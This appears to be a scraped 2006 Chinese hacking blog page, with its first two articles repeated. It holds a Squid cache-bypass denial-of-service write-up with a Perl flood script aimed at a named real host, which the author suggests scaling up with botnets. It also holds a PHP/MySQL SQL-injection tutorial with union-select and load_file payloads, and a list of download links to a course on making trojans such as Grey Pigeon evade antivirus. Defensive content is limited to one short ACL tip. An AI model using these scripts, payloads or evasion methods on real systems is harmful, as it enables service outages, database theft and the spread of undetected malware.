随着Web技术越来越广泛的应用到我们的生活,Web应用的架构的设计者和开发者不得不面对这么一个问题,那就是Web不断增长的访问量和负载,随之提升性能的相关技术应运而生,如DNS轮询、负载均衡、Cache技术等等。如果有兴趣,大家不妨对大型网站进行一下抓包,可以发现很多网站都采用了squid反向代理,通过Squid的Cache提供高速Web响应。
攻击原理
Cache机制不仅给服务器处理带来了很大程度的性能提升,一定程度上,也大大提升了Web服务提供商应对Get Flood的能力。
用户对网站的访问,大多被分布的Cache服务器分担了,由于Cache服务器的数量以及Cache的良好处理吞吐性能,即便发生了Get Flood等攻击,此种机制也可以很好的自身消化掉攻击负载,并且即便单一Cache主机瘫痪也不会对整体Web服务造成影响。
我们可以假设这样一种形势,如果攻击者可以穿过Cache,直接将负载压力传达到后台提供HTTP服务的服务器,将这台机器攻击瘫痪,那么前台的服务器也将因为Cache无法得到更新而服务受到影响,达到拒绝服务的效果。
那么是否有方法可以达到上述效果呢?答案是肯定的,那就是通过HTTP指令来达到此种攻击。
HTTP协议(v1.1和v1.0)都提供了Cache处理字段,其中字段Cache-Control(v1.0中为Pragma),当这个字段的值为no-cache时,大多数cache软件将不对请求作出响应,而直接将请求传递到后台服务器,利用这个指令的机制,我们就可以实现我们所要达到的攻击效果。
效果验证
为了验证这种理论上的攻击形式,Coolc架设了简单的应用环境进行验证
正常访问
而在正常情况下,Squid会在内存Cache中处理所有请求,可以发现大多数请求的压力根本无法到达Apache,而直接在Squid消化。如下所示,500个请求,只有一个到达了Apache,而这个访问,只是Squid为了到Apache拉取最初始的文件内容造成的。
root@coolc:~/squid-2.5.STABLE12#cat apache-host.example.com-access_log wc -l
1
root@coolc:~/squid-2.5.STABLE12# cat squid_access.log awk '{print $4'} uniq -c
499 TCP_MEM_HIT/200
指令绕过
当Squid在处理访问时,如果发现特殊的标志位后,其将会直接将请求向后转发,同事将在访问日志中记为一条TCP_CLIENT_REFRESH_MISS。通过下面试验,我发送了500个带特殊标志位的HTTP请求,直接越过了Cache,而将压力直接加载到后台,下面的结果我们验证了效果。
用Pragma: no-cache绕过
root@coolc:~/squid-2.5.STABLE12#cat apache-host.example.com-access_log wc -l
500
root@coolc:~/squid-2.5.STABLE12# cat squid_access.log awk '{print $4'} uniq -c
500 TCP_CLIENT_REFRESH_MISS/200
用Cache-Control:no-cache绕过
root@coolc:~/squid-2.5.STABLE12# cat apache-host.example.com-access_log wc -l
500
root@coolc:~/squid-2.5.STABLE12# cat squid_access.log awk '{print $4'} uniq -c
500 TCP_CLIENT_REFRESH_MISS/200
演示代码:
use IO::Socket;
#$host=shift(@ARGV);
$i=1;
while ($i<500) {
$i++;
print " $i ";
$remote = IO::Socket::INET->new(Proto => "tcp",
PeerPort => "80",
#PeerAddr => "blog.xfocus.net"
PeerAddr => "test.qq.com"
) die(print "cant't connet $!");
$remote->autoflush(1);
print $remote "GET /index.html HTTP/1.1 Accept:image/gif image/x-xbitmap,
image/jpeg,application/x-shockwave-flash Referer: http://www.google.com Accept:-
Language: zh-cn User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1) Cache-Control:no-
cache HOST:test.qq.com ";
#print <$remote>;
close $remote;
#sleep 1;
}
实际应用
利用配置问题
在实际应用中的攻击,也许对方网管会采取作Squid的ACL方法来屏蔽此种攻击,但是实际环境中的攻击种类和方法会更加多样化,例如利用Squid默认配置中存在的问题,一样可以达到灵巧利用此问题,并具有一定隐蔽性。
场景某网管在Squid通过ACL做了no-cache过滤,使得加杂no-cahce的指令无法穿过,但是一样遭到了Cache拒绝服务攻击。
攻击原理
Squid的处理方式当返回为404、403时,通过cache处理减轻后台Web系统的负担。
通过程序用GET方式访问500次不存在的文件“index.html。”
查看squid的日志,cache住了绝大多数请求。
root@coolc:~/squid-2.5.STABLE12# cat squid_access.log wc -l
499
root@coolc:~/squid-2.5.STABLE12# cat squid_access.log awk '{print $4'} uniq -c
499 TCP_NEGATIVE_HIT/404
root@coolc:~/squid-2.5.STABLE12# cat apache-access_log wc -l
0
而实际上传到到Apache上的压力为0,也就是几乎没有压力。TCP_NEGATIVE_HIT解决了大多数的负载,导致攻击压力全部不能施加在后台的Web服务器。
从Squid的配置文件里可以看到,Squid对于特殊错误的返回也是做了处理的,一样做了Cache。
# TAG: negative_ttl time-units
# Time-to-Live (TTL) for failed requests. Certain types of
# failures (such as "connection refused" and "404 Not Found") are
# negatively-cached for a configurable amount of time. The
# default is 5 minutes. Note that this is different from
# negative caching of DNS lookups.
是否有方式可以绕过cache机制和ACL限制,将类似404压力施加到服务器上?答案时肯定的,那就是通过访问cgi-bin目录下的文件。
通过执行攻击代码我们同样实现了对后台主机的攻击,穿透了Cache。
root@coolc:~/squid-2.5.STABLE12# cat squid_access.log awk '{print $4'} uniq -c
499 TCP_MISS/404
root@coolc:~/squid-2.5.STABLE12# cat apache-access_log wc -l
499
从日志中可以发现如下痕迹。
172.16.10.1 - - [08/Apr/2006:16:33:50 -0800] "GET /cgi-bin/index.html1 HTTP/1.0" 404 298
172.16.10.1 - - [08/Apr/2006:16:33:50 -0800] "GET /cgi-bin/index.html1 HTTP/1.0" 404 298
172.16.10.1 - - [08/Apr/2006:16:33:50 -0800] "GET /cgi-bin/index.html1 HTTP/1.0" 404 298
172.16.10.1 - - [08/Apr/2006:16:33:50 -0800] "GET /cgi-bin/index.html1 HTTP/1.0" 404 298
实际上造成上述原因就死活因为默认配置中对于cgi-bin目录做了特殊处理,导致对于其放开了Cache的限制。
# TAG: hierarchy_stoplist
# A list of words which, if found in a URL, cause the object to
# be handled directly by this cache. In other words, use this
# to not query neighbor caches for certain objects. You may
# list this option multiple times. Note: never_direct overrides
# this option.
#We recommend you to use at least the following line.
hierarchy_stoplist cgi-bin ?
# TAG: no_cache
# A list of ACL elements which, if matched, cause the request to
# not be satisfied from the cache and the reply to not be cached.
# In other words, use this to force certain objects to never be cached.
#
# You must use the word 'DENY' to indicate the ACL names which should
# NOT be cached.
#
#We recommend you to use the following two lines.
acl QUERY urlpath_regex cgi-bin ?
no_cache deny QUERY
攻击代码:
use IO::Socket;
#$host=shift(@ARGV);
$i=1;
while ($i<500) {
$i++;
print " $i ";
$remote = IO::Socket::INET->new(Proto => "tcp",
PeerPort => "80",
#PeerAddr => "blog.xfocus.net"
PeerAddr => "test.qq.com"
) die(print "cant't connet $!");
$remote->autoflush(1);
print $remote "GET /cgi-bin/index.html1 HTTP/1.1 Accept:image/gif image/x-
xbitmap, image/jpeg,application/x-shockwave-flash Referer:
http://www.google.com Accept:-Language: zh-cn User-Agent: Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)
HOST:test.qq.com ";
#print <$remote>;
close $remote;
#sleep 1;
}
扩展思路
当然目前这种攻击方式还仅仅是理论上的攻击,比如攻击代码单线程,攻击IP和特征明显。很容易被识别并作ACL过滤。但是当我们扩展思路,如果我们利用大量的botnet或代理,变化所访问的文件和HTTP指令内容进行攻击,那么造成的攻击将会更加有威力,并且难以识别。同时由于攻击负责将直接加载于后台,那么作为防御方的主机资源优势也大打折扣。
防御方法
最简单有效的方法无非是通过SQUID的配置中加载ACL禁用no-cache指令,不过此方法往往只在静态页面的服务器比较容易实现。
如:
acl LocalServers dst 192.168.8.0/24
no_cache deny LocalServers
总结
实际上HTTP指令的攻击不仅仅与此,本身HTTP协议的扩展协议指令一样有很多有待挖掘的地方,对于此种攻击思路,虽然Coolc目前还没看到相关的描述,但是个人感觉也许在地下组织中,这些思路早已出现,甚至已经有了成熟的工具,coolc在这里全当抛砖引玉,希望对网络安全有兴趣的同仁可以同我联系,共同讨论研究。
随着Web技术越来越广泛的应用到我们的生活,Web应用的架构的设计者和开发者不得不面对这么一个问题,那就是Web不断增长的访问量和负载,随之提升性能的相关技术应运而生,如DNS轮询、负载均衡、Cache技术等等。如果有兴趣,大家不妨对大型网站进行一下抓包,可以发现很多网站都采用了squid反向代理,通过Squid的Cache提供高速Web响应。
攻击原理
Cache机制不仅给服务器处理带来了很大程度的性能提升,一定程度上,也大大提升了Web服务提供商应对Get Flood的能力。
用户对网站的访问,大多被分布的Cache服务器分担了,由于Cache服务器的数量以及Cache的良好处理吞吐性能,即便发生了Get Flood等攻击,此种机制也可以很好的自身消化掉攻击负载,并且即便单一Cache主机瘫痪也不会对整体Web服务造成影响。
我们可以假设这样一种形势,如果攻击者可以穿过Cache,直接将负载压力传达到后台提供HTTP服务的服务器,将这台机器攻击瘫痪,那么前台的服务器也将因为Cache无法得到更新而服务受到影响,达到拒绝服务的效果。
那么是否有方法可以达到上述效果呢?答案是肯定的,那就是通过HTTP指令来达到此种攻击。
HTTP协议(v1.1和v1.0)都提供了Cache处理字段,其中字段Cache-Control(v1.0中为Pragma),当这个字段的值为no-cache时,大多数cache软件将不对请求作出响应,而直接将请求传递到后台服务器,利用这个指令的机制,我们就可以实现我们所要达到的攻击效果。
效果验证
为了验证这种理论上的攻击形式,Coolc架设了简单的应用环境进行验证
正常访问
而在正常情况下,Squid会在内存Cache中处理所有请求,可以发现大多数请求的压力根本无法到达Apache,而直接在Squid消化。如下所示,500个请求,只有一个到达了Apache,而这个访问,只是Squid为了到Apache拉取最初始的文件内容造成的。
root@coolc:~/squid-2.5.STABLE12#cat apache-host.example.com-access_log wc -l
1
root@coolc:~/squid-2.5.STABLE12# cat squid_access.log awk '{print $4'} uniq -c
499 TCP_MEM_HIT/200
指令绕过
当Squid在处理访问时,如果发现特殊的标志位后,其将会直接将请求向后转发,同事将在访问日志中记为一条TCP_CLIENT_REFRESH_MISS。通过下面试验,我发送了500个带特殊标志位的HTTP请求,直接越过了Cache,而将压力直接加载到后台,下面的结果我们验证了效果。
用Pragma: no-cache绕过
root@coolc:~/squid-2.5.STABLE12#cat apache-host.example.com-access_log wc -l
500
root@coolc:~/squid-2.5.STABLE12# cat squid_access.log awk '{print $4'} uniq -c
500 TCP_CLIENT_REFRESH_MISS/200
用Cache-Control:no-cache绕过
root@coolc:~/squid-2.5.STABLE12# cat apache-host.example.com-access_log wc -l
500
root@coolc:~/squid-2.5.STABLE12# cat squid_access.log awk '{print $4'} uniq -c
500 TCP_CLIENT_REFRESH_MISS/200
演示代码:
use IO::Socket;
#$host=shift(@ARGV);
$i=1;
while ($i<500) {
$i++;
print " $i ";
$remote = IO::Socket::INET->new(Proto => "tcp",
PeerPort => "80",
#PeerAddr => "blog.xfocus.net"
PeerAddr => "test.qq.com"
) die(print "cant't connet $!");
$remote->autoflush(1);
print $remote "GET /index.html HTTP/1.1 Accept:image/gif image/x-xbitmap,
image/jpeg,application/x-shockwave-flash Referer: http://www.google.com Accept:-
Language: zh-cn User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1) Cache-Control:no-
cache HOST:test.qq.com ";
#print <$remote>;
close $remote;
#sleep 1;
}
实际应用
利用配置问题
在实际应用中的攻击,也许对方网管会采取作Squid的ACL方法来屏蔽此种攻击,但是实际环境中的攻击种类和方法会更加多样化,例如利用Squid默认配置中存在的问题,一样可以达到灵巧利用此问题,并具有一定隐蔽性。
场景某网管在Squid通过ACL做了no-cache过滤,使得加杂no-cahce的指令无法穿过,但是一样遭到了Cache拒绝服务攻击。
攻击原理
Squid的处理方式当返回为404、403时,通过cache处理减轻后台Web系统的负担。
通过程序用GET方式访问500次不存在的文件“index.html。”
查看squid的日志,cache住了绝大多数请求。
root@coolc:~/squid-2.5.STABLE12# cat squid_access.log wc -l
499
root@coolc:~/squid-2.5.STABLE12# cat squid_access.log awk '{print $4'} uniq -c
499 TCP_NEGATIVE_HIT/404
root@coolc:~/squid-2.5.STABLE12# cat apache-access_log wc -l
0
而实际上传到到Apache上的压力为0,也就是几乎没有压力。TCP_NEGATIVE_HIT解决了大多数的负载,导致攻击压力全部不能施加在后台的Web服务器。
从Squid的配置文件里可以看到,Squid对于特殊错误的返回也是做了处理的,一样做了Cache。
# TAG: negative_ttl time-units
# Time-to-Live (TTL) for failed requests. Certain types of
# failures (such as "connection refused" and "404 Not Found") are
# negatively-cached for a configurable amount of time. The
# default is 5 minutes. Note that this is different from
# negative caching of DNS lookups.
是否有方式可以绕过cache机制和ACL限制,将类似404压力施加到服务器上?答案时肯定的,那就是通过访问cgi-bin目录下的文件。
通过执行攻击代码我们同样实现了对后台主机的攻击,穿透了Cache。
root@coolc:~/squid-2.5.STABLE12# cat squid_access.log awk '{print $4'} uniq -c
499 TCP_MISS/404
root@coolc:~/squid-2.5.STABLE12# cat apache-access_log wc -l
499
从日志中可以发现如下痕迹。
172.16.10.1 - - [08/Apr/2006:16:33:50 -0800] "GET /cgi-bin/index.html1 HTTP/1.0" 404 298
172.16.10.1 - - [08/Apr/2006:16:33:50 -0800] "GET /cgi-bin/index.html1 HTTP/1.0" 404 298
172.16.10.1 - - [08/Apr/2006:16:33:50 -0800] "GET /cgi-bin/index.html1 HTTP/1.0" 404 298
172.16.10.1 - - [08/Apr/2006:16:33:50 -0800] "GET /cgi-bin/index.html1 HTTP/1.0" 404 298
实际上造成上述原因就死活因为默认配置中对于cgi-bin目录做了特殊处理,导致对于其放开了Cache的限制。
# TAG: hierarchy_stoplist
# A list of words which, if found in a URL, cause the object to
# be handled directly by this cache. In other words, use this
# to not query neighbor caches for certain objects. You may
# list this option multiple times. Note: never_direct overrides
# this option.
#We recommend you to use at least the following line.
hierarchy_stoplist cgi-bin ?
# TAG: no_cache
# A list of ACL elements which, if matched, cause the request to
# not be satisfied from the cache and the reply to not be cached.
# In other words, use this to force certain objects to never be cached.
#
# You must use the word 'DENY' to indicate the ACL names which should
# NOT be cached.
#
#We recommend you to use the following two lines.
acl QUERY urlpath_regex cgi-bin ?
no_cache deny QUERY
攻击代码:
use IO::Socket;
#$host=shift(@ARGV);
$i=1;
while ($i<500) {
$i++;
print " $i ";
$remote = IO::Socket::INET->new(Proto => "tcp",
PeerPort => "80",
#PeerAddr => "blog.xfocus.net"
PeerAddr => "test.qq.com"
) die(print "cant't connet $!");
$remote->autoflush(1);
print $remote "GET /cgi-bin/index.html1 HTTP/1.1 Accept:image/gif image/x-
xbitmap, image/jpeg,application/x-shockwave-flash Referer:
http://www.google.com Accept:-Language: zh-cn User-Agent: Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)
HOST:test.qq.com ";
#print <$remote>;
close $remote;
#sleep 1;
}
扩展思路
当然目前这种攻击方式还仅仅是理论上的攻击,比如攻击代码单线程,攻击IP和特征明显。很容易被识别并作ACL过滤。但是当我们扩展思路,如果我们利用大量的botnet或代理,变化所访问的文件和HTTP指令内容进行攻击,那么造成的攻击将会更加有威力,并且难以识别。同时由于攻击负责将直接加载于后台,那么作为防御方的主机资源优势也大打折扣。
防御方法
最简单有效的方法无非是通过SQUID的配置中加载ACL禁用no-cache指令,不过此方法往往只在静态页面的服务器比较容易实现。
如:
acl LocalServers dst 192.168.8.0/24
no_cache deny LocalServers
总结
实际上HTTP指令的攻击不仅仅与此,本身HTTP协议的扩展协议指令一样有很多有待挖掘的地方,对于此种攻击思路,虽然Coolc目前还没看到相关的描述,但是个人感觉也许在地下组织中,这些思路早已出现,甚至已经有了成熟的工具,coolc在这里全当抛砖引玉,希望对网络安全有兴趣的同仁可以同我联系,共同讨论研究。
标签: HTTP指令攻击之Cache篇
PHP注射基础 经验 技巧汇总篇
作者:天晴无名氏 日期:2006-12-18 06:51
第一讲:判断有没注射点
这个很简单,我们最常用的就是看到页面的格式为:index.php?id=2这样的地址,我们知道PHP经常是和MYSQL数据库一起用的,在MYSQL数据库中一定存在一个表,比如setting_table,我们提交上面地址的时候,程序一般上这样处理的:
1、用GET或者POST取我们提交的id=1把这个值传给一个变量:$id.
2、查询:select * from setting_table where id =$id
上面的语句就是查询的语句,我们代入$id=1就是:
select * from setting_table where id=1
这话是没什么问题的,会取出id为1的信息进行显示给我们,所以我们就能看到正常的页面。
--------------
看我们是怎么判断的:
1、我们提交id=1 and 1=1
看看这个是什么效果,这里的$id就是1 and 1=1,我们看看是什么样子的:
select * from setting_table where id =1 and 1=1
这个语句加了一个and 语句,后面是1=1是肯定成立的,所以就不影响上面语句的成立,它还会取出id=1的信息进行显示给我们,所以我们看到的还是原来的正常页面。
2、我们提交 id =1 and 1=2
看看这个是什么效果,这里的$id就是 1 and 1=2,我们看看在SQL中怎么执行
select * from setting_table where id =1 and 1=2
分析下这个语句,前面还是一样的,只是最后加了个and 1=2,这个自然不成立啦!又因为是and连接的,so自然找不到符合条件的啦!只能回显给我们一个错误或者空白的页面拉~!!
上面就是一般我们采用and 1=1 & and 1=2来判断的基本原来,但是这里还要注意几点,如下:
1、程序处理的时候必须是where id =$id 而不是where id=$id,这个单引号是很不一样的,怎么不一样,以后再说。。
2、程序对我们提交的参数没有处理或者处理的不好,导致我们可以直接提交,如果程序多我们提交的参数进行处理,又会不一样,也是后话!
第二讲:快速判断MYSQL版本
前提:你得到一个注射点,比如:news.php?id=1
这个点是你找到的,提交and 1=1 和and 1=2返回的是不同的。
我们就可以这样来猜MYSQL的版本了。。步骤如下:
1、提交/news.php?id=1/*!40000%20s*/ 如果返回正常就说明MYSQL版本在4000版本以下,你可以依次调节最高位的数字,比如我改为39000提交,如果再正常,就提交38000....直到返回错误提示,最后固定的那个就是MYSQL的版本了。。
下面是我提交测试时的过程(只写MYSQL版本)
40000(+)--39000(+)--38000(+)--370000(-)--37900(+)--37800(+)--37700(-)--结束!!
得到MYSQL版本是37700。
2、一般我们不去猜具体的版本,我们只关系MYSQL是不是在4.0以上,以为只有4.0以上的MYSQL才支持UNION查询,以下是不支持的,所以我们经常只用/*!40000%20s*/ 看看是不是4.0以上的版本。
PS:/*!40000%20s*/ 这里的/*!......*/是mysql里一种特殊的注释方式,也没什么好奇怪的,记得怎么用就可以了~~
第三讲:PHP注射怎样得到表名。。
正准备写,看到有人问到了,就总结下,算第三讲吧!
Quote:
originally posted by spirit at 2006-5-16 05:57 PM:
看了好多 文章了 ....眼睛都花了
里面涉及到的东西也比较全面
不过 一直不知道怎么搞出 表
总不能直接搞 去 字段吧..??
一个一个来啊
数据库 表 字段 值...
这个逻辑我认为是对的 ....
对了这里还是 感 ...
表确实不好搞,不像ASP可能直接暴出来,PHP到现在还是暴不出来的,我们一般有两个办法:
1、靠经验猜:比如大家常用的admin,user,news,vote,wenzhang,guanliyuan等等,没办法的事。。
2、暴代码查看:用Load_file暴出文件代码,就可以看到数据插值到什么表,什么字段了,这样就很明白了,但是load_file也很有技巧的。。以后再讲。。
--------------------------------------------
具体说一下吧:
1、这个没什么好说的,直接猜就可以了,比如你看到一个注射点,类似news.php?id=1这样的点,你用union查询得到具体的字段,比如这样:news.php?id=1 and 1=2 union select 1,2,3,4 是成立的,
你就可以这样猜:news.php?id=1 and 1=2 union select 1,2,3,4 from admin/*如果存在admin表,就会返回真,否则就不存在表admin,其他和这个一样的。
2、这个就有点终极了,比如你得到他的绝对路径,可以load_file(file path)出文件的代码,比如你暴得管理员登陆的页面,就能看到他其中的SQL语句,可以看到他是从哪个表了取的值了,是吧》》
原理就是这样的,多多思考,有什么心得,希望能分享。。。。
第四讲:有无引号的差别
很多朋友都对那个引号的作用不很了解,认为加引号和不加是一样的效果..
引号(包括单、双)对我们的注射是有着很大的影响的,这里主要还是和magic的状态有关,当这个magic为off的时候倒没什么影响,当这个magic为on的时候就大不一样了。。
小知识:magic为on时,为自动为我们提交的单引号(‘),双引号(“),(),空格( )等加上转意 符号,使得上的都变成(\’),(”),(\)等,这就给我们注射太来麻烦,例子如下。
一、第一个例子(没引号)
如果语句如下:
QUOTE:
select * from news where newsid=$id
1、magic为off时情况
为off时不会处理我们提交的数据信息,假设一个SQL语句是这样的;
我们在URL中可以提交$id的值,就像我们前面说的给$id为:
$id=1 union select 1,2,3,4 from admin
就基本上可以取得我们想要的数据了。
2、magic为on时情况
这时没什么区别,因为我们没有提交敏感的字符
二、第二个例子看它处理的SQL语句:
QUOTE:
select * from news where newsid=$id
这时要想成功利用$id这个没过滤的参数,我们可以提交如下:
$id=1’ union select 1,2,3,4 from admin/*
开始要有一个()来闭合前面的,后面再加一个/*注释掉后面的
1、magic为off时情况
如果magic为off,我们可以直接提交,成功利用
2、magic为on时情况
如果magic为on,那么我们提交的语句变成:
$id=1’ union select 1,2,3,4 from admin/*
看,就没办法利用了(尽管有漏洞)
这个很简单,我们最常用的就是看到页面的格式为:index.php?id=2这样的地址,我们知道PHP经常是和MYSQL数据库一起用的,在MYSQL数据库中一定存在一个表,比如setting_table,我们提交上面地址的时候,程序一般上这样处理的:
1、用GET或者POST取我们提交的id=1把这个值传给一个变量:$id.
2、查询:select * from setting_table where id =$id
上面的语句就是查询的语句,我们代入$id=1就是:
select * from setting_table where id=1
这话是没什么问题的,会取出id为1的信息进行显示给我们,所以我们就能看到正常的页面。
--------------
看我们是怎么判断的:
1、我们提交id=1 and 1=1
看看这个是什么效果,这里的$id就是1 and 1=1,我们看看是什么样子的:
select * from setting_table where id =1 and 1=1
这个语句加了一个and 语句,后面是1=1是肯定成立的,所以就不影响上面语句的成立,它还会取出id=1的信息进行显示给我们,所以我们看到的还是原来的正常页面。
2、我们提交 id =1 and 1=2
看看这个是什么效果,这里的$id就是 1 and 1=2,我们看看在SQL中怎么执行
select * from setting_table where id =1 and 1=2
分析下这个语句,前面还是一样的,只是最后加了个and 1=2,这个自然不成立啦!又因为是and连接的,so自然找不到符合条件的啦!只能回显给我们一个错误或者空白的页面拉~!!
上面就是一般我们采用and 1=1 & and 1=2来判断的基本原来,但是这里还要注意几点,如下:
1、程序处理的时候必须是where id =$id 而不是where id=$id,这个单引号是很不一样的,怎么不一样,以后再说。。
2、程序对我们提交的参数没有处理或者处理的不好,导致我们可以直接提交,如果程序多我们提交的参数进行处理,又会不一样,也是后话!
第二讲:快速判断MYSQL版本
前提:你得到一个注射点,比如:news.php?id=1
这个点是你找到的,提交and 1=1 和and 1=2返回的是不同的。
我们就可以这样来猜MYSQL的版本了。。步骤如下:
1、提交/news.php?id=1/*!40000%20s*/ 如果返回正常就说明MYSQL版本在4000版本以下,你可以依次调节最高位的数字,比如我改为39000提交,如果再正常,就提交38000....直到返回错误提示,最后固定的那个就是MYSQL的版本了。。
下面是我提交测试时的过程(只写MYSQL版本)
40000(+)--39000(+)--38000(+)--370000(-)--37900(+)--37800(+)--37700(-)--结束!!
得到MYSQL版本是37700。
2、一般我们不去猜具体的版本,我们只关系MYSQL是不是在4.0以上,以为只有4.0以上的MYSQL才支持UNION查询,以下是不支持的,所以我们经常只用/*!40000%20s*/ 看看是不是4.0以上的版本。
PS:/*!40000%20s*/ 这里的/*!......*/是mysql里一种特殊的注释方式,也没什么好奇怪的,记得怎么用就可以了~~
第三讲:PHP注射怎样得到表名。。
正准备写,看到有人问到了,就总结下,算第三讲吧!
Quote:
originally posted by spirit at 2006-5-16 05:57 PM:
看了好多 文章了 ....眼睛都花了
里面涉及到的东西也比较全面
不过 一直不知道怎么搞出 表
总不能直接搞 去 字段吧..??
一个一个来啊
数据库 表 字段 值...
这个逻辑我认为是对的 ....
对了这里还是 感 ...
表确实不好搞,不像ASP可能直接暴出来,PHP到现在还是暴不出来的,我们一般有两个办法:
1、靠经验猜:比如大家常用的admin,user,news,vote,wenzhang,guanliyuan等等,没办法的事。。
2、暴代码查看:用Load_file暴出文件代码,就可以看到数据插值到什么表,什么字段了,这样就很明白了,但是load_file也很有技巧的。。以后再讲。。
--------------------------------------------
具体说一下吧:
1、这个没什么好说的,直接猜就可以了,比如你看到一个注射点,类似news.php?id=1这样的点,你用union查询得到具体的字段,比如这样:news.php?id=1 and 1=2 union select 1,2,3,4 是成立的,
你就可以这样猜:news.php?id=1 and 1=2 union select 1,2,3,4 from admin/*如果存在admin表,就会返回真,否则就不存在表admin,其他和这个一样的。
2、这个就有点终极了,比如你得到他的绝对路径,可以load_file(file path)出文件的代码,比如你暴得管理员登陆的页面,就能看到他其中的SQL语句,可以看到他是从哪个表了取的值了,是吧》》
原理就是这样的,多多思考,有什么心得,希望能分享。。。。
第四讲:有无引号的差别
很多朋友都对那个引号的作用不很了解,认为加引号和不加是一样的效果..
引号(包括单、双)对我们的注射是有着很大的影响的,这里主要还是和magic的状态有关,当这个magic为off的时候倒没什么影响,当这个magic为on的时候就大不一样了。。
小知识:magic为on时,为自动为我们提交的单引号(‘),双引号(“),(),空格( )等加上转意 符号,使得上的都变成(\’),(”),(\)等,这就给我们注射太来麻烦,例子如下。
一、第一个例子(没引号)
如果语句如下:
QUOTE:
select * from news where newsid=$id
1、magic为off时情况
为off时不会处理我们提交的数据信息,假设一个SQL语句是这样的;
我们在URL中可以提交$id的值,就像我们前面说的给$id为:
$id=1 union select 1,2,3,4 from admin
就基本上可以取得我们想要的数据了。
2、magic为on时情况
这时没什么区别,因为我们没有提交敏感的字符
二、第二个例子看它处理的SQL语句:
QUOTE:
select * from news where newsid=$id
这时要想成功利用$id这个没过滤的参数,我们可以提交如下:
$id=1’ union select 1,2,3,4 from admin/*
开始要有一个()来闭合前面的,后面再加一个/*注释掉后面的
1、magic为off时情况
如果magic为off,我们可以直接提交,成功利用
2、magic为on时情况
如果magic为on,那么我们提交的语句变成:
$id=1’ union select 1,2,3,4 from admin/*
看,就没办法利用了(尽管有漏洞)
标签: PHP注射基础
新世纪网安高级免杀1-31 {精品}
作者:admin 日期:2006-12-16 06:52
第一课2006年免杀新技术综合总结与分析
地址:http://vip.cech.com.cn/310824/276e75a9fa99ff4b9ab350f3f328b8db49e75162.down
第二课免杀学习方法技巧与环境详解
地址:http://vip.cech.com.cn/310854/b1938a1a98b7d09cb85f004b561ecba7eab913a1.down
第三课06年流行免杀工具终极组合技巧篇
地址:http://vip.cech.com.cn/310844/51e6c906247d3cef28c38e9cc115928f2b8b9ba8.down
第四课手工加密加花方法演示
地址:http://vip.cech.com.cn/311954/9b09c406166b09612d996c902a222cfbf90afa30.down
第五课免杀工具灵活组合打造超强免杀木马
地址:http://vip.cech.com.cn/311694/ded30f29ae6a8e0c12165dc60ab7ab69ce6e877f.down
第六课myccl定位复合特征码原理与使用介绍
地址:http://vip.cech.com.cn/315334/14bd37ecc46e6063f17e3186249aac9c1ffd1cb8.down
第七课实战myccl定位文件复合特码
地址:http://vip.cech.com.cn/315614/da57136fb9cdf0e14806b81d9f5029646e914502.down
第八课实战myccl定位内存复合特码
地址:http://vip.cech.com.cn/311904/63e50e2dbce4b4581e04da8cab976d1cabf40c83.down
第九课mycll综合定位特征码技巧总结篇
地址:http://vip.cech.com.cn/315324/e47f5eeb76dcbf4372c517e89cced7c956af3804.down
第十课编写花指令之必备汇编知识总结
地址:http://vip.cech.com.cn/312804/d8e69eea48c072e8b8fd2a64bc27f9c193777377.down
第十二课编写自己免杀花指令方法总结一
地址:http://vip.cech.com.cn/312794/be9536d72b63a818906b0cd64143f38eab4de510.down
第十三课编写自己免杀花指令方法总结二
地址:http://vip.cech.com.cn/315644/0b5f183220100e1e0b9110272690d3c66f70741a.down
第十四课花指令轻松过卡巴之终极秘籍总结
地址:http://vip.cech.com.cn/315674/fc45898af1dc4133b10aace2978441854f4203b8.down
第十五课修改PE头反调试免杀法(一)
地址:http://vip.cech.com.cn/311674/9021cd92a60ca01522e7bbf6d01a0f8409a3bf22.down
第十五课修改PE头反调试免杀法(二)
地址:http://vip.cech.com.cn/311574/d1dd11bdaa934f8ac9cb2eb22c36e741bd905768.down
第十六课绝密免杀最新技术的揭密与研究过程
地址:http://vip.cech.com.cn/311704/fa621f89421c08f248daa557ef5c089e6af31617.down
第十七课UPX壳的几种经典改壳免杀方法
地址:http://vip.cech.com.cn/311914/30be57dbb2eabdb2690f608732887f7ad7a7775b.down
第十八课北斗壳的几种超级免杀改壳方法(一)
地址:http://vip.cech.com.cn/312004/3ce9a8a1ba6e8edb891e28b82e1c89b149a55a16.down
第十八课北斗壳的几种超级免杀改壳方(二)
地址:http://vip.cech.com.cn/311994/afbde4bfeb58d4ea22203d5254a159ccf42f2e94.down
第十九课常见压缩壳的免杀修改方法总结篇(一)
地址:http://vip.cech.com.cn/311974/4f5882ec0e65f5797c033a528cb8acf11af7ac5a.down
第十九课常见压缩壳的免杀修改方法总结篇(二)
地址:http://vip.cech.com.cn/311984/56499a606d430ade24d810d6743c906ca0253968.down
第二十课免杀卡巴思路与技巧总结 :
地址:http://vip.cech.com.cn/311964/64f6989b638d64f0bca23edec29bc7917074d6c9.down
第二十一课 06年木马免杀常见疑难问题及解决策略篇
地址:http://vip.cech.com.cn/311864/37b71b55fd093ea0dcc53540bb5cd7eedb3239e9.down
第二十一课 06年木马免杀常见疑难问题及解决策略篇[补]
地址:http://vip.cech.com.cn/311874/dc6276733edb2dce52a0070d9da0c5a56e9fa34b.down
第二十二课06年各种杀毒软件查杀特点与免杀对策方案
地址:http://vip.cech.com.cn/312134/4aa36886b4370ad4cd08f00760b4647521149445.down
第二十三课06年综合木马免杀方案精华浓缩与总结
地址:http://vip.cech.com.cn/311884/788fdf3bd3b7c1f5aa4190f5dae741cd415fae99.down
第二十四课2006VIP灰鸽子最新免杀演示
地址:http://vip.cech.com.cn/312154/fc5f13a6dc8c422c8be5772caea76207dd0414e4.down
第二十四课2006VIP灰鸽子最新免杀演示
地址:http://vip.cech.com.cn/312164/782dd8e0ec0c0b64146fa1bce255b577204be56b.down
第二十五课黑防鸽子全免杀演示
地址:http://vip.cech.com.cn/312144/18327576c215c728033c87b9be6384d0aac45fb9.down
第二十六课黑防鸽子免杀策略分析
